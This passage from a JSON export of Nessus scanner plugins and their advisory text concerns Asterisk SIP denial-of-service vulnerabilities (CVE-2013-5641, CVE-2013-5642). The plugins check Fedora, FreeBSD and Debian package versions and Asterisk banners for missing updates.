2013-15560.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69886);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"FEDORA\", value:\"2013-15560\");\n\n script_name(english:\"Fedora 19 : asterisk-11.5.1-2.fc19 (2013-15560)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-1 :\n\n - The Asterisk Development Team has announced security\n releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2,\n 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1002044\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?552696dd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"asterisk-11.5.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:01", "description": "The Asterisk project reports :\n\nRemote Crash From Late Arriving SIP ACK With SDP\n\nRemote Crash when Invalid SDP is sent in SIP Request", "cvss3": {}, "published": "2013-08-29T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (fd2bf3b5-1001-11e3-ba94-0025905a4771)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_FD2BF3B5100111E3BA940025905A4771.NASL", "href": "https://www.tenable.com/plugins/nessus/69499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69499);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (fd2bf3b5-1001-11e3-ba94-0025905a4771)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk project reports :\n\nRemote Crash From Late Arriving SIP ACK With SDP\n\nRemote Crash when Invalid SDP is sent in SIP Request\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # https://vuxml.freebsd.org/freebsd/fd2bf3b5-1001-11e3-ba94-0025905a4771.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094717d7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11>11.*<11.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10>10.*<10.12.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18>1.8.*<1.8.21.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:58:48", "description": "- Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> - 11.5.1-1 :\n\n - The Asterisk Development Team has announced security releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2, 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-09-14T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.5.1-2.fc18 (2013-15567)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-15567.NASL", "href": "https://www.tenable.com/plugins/nessus/69887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-15567.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69887);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"FEDORA\", value:\"2013-15567\");\n\n script_name(english:\"Fedora 18 : asterisk-11.5.1-2.fc18 (2013-15567)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-2 :\n\n - Enable hardened build BZ#954338\n\n - Significant clean ups\n\n - Thu Aug 29 2013 Jeffrey Ollie <jeff at ocjtech.us> -\n 11.5.1-1 :\n\n - The Asterisk Development Team has announced security\n releases for Certified\n\n - Asterisk 1.8.15, 11.2, and Asterisk 1.8, 10, and 11.\n The available security releases\n\n - are released as versions 1.8.15-cert2, 11.2-cert2,\n 1.8.23.1, 10.12.3, 10.12.3-digiumphones,\n\n - and 11.5.1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1002044\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4f6d185d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.5.1-2.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:58:35", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in the SIP processing code of Asterisk - an open source PBX and telephony toolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Debian DSA-2749-1 : asterisk - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2749.NASL", "href": "https://www.tenable.com/plugins/nessus/69542", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2749. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69542);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"DSA\", value:\"2749\");\n\n script_name(english:\"Debian DSA-2749-1 : asterisk - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2749\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the oldstable distribution (squeeze), these problems have been\nfixed in version 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1.8.13.1~dfsg-3+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"asterisk\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-config\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dbg\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dev\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-doc\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-h323\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-sounds-main\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-config\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dahdi\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dbg\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dev\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-doc\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mobile\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-modules\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mp3\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mysql\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-ooh323\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-imapstorage\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-odbcstorage\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:59:16", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. \n\nThe application does not properly handle an invalid SDP in a SIP request if such a request defines media descriptions and then defines connection data.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_005.NASL", "href": "https://www.tenable.com/plugins/nessus/69559", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69559);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-5642\");\n script_bugtraq_id(62022);\n\n script_name(english:\"Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability. \n\nThe application does not properly handle an invalid SDP in a SIP request\nif such a request defines media descriptions and then defines connection\ndata.\");\n # https://www.asterisk.org/downloads/asterisk-news/asterisk-1815-cert3-18231-10123-10123-digiumphones-112-cert2-and-1151-now\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?116d061b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22007\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.23.1 / 10.12.3 / 11.5.1 / Certified Asterisk\n1.8.15-cert3 / 11.2-cert2, or apply the appropriate patch listed in the\nAsterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = 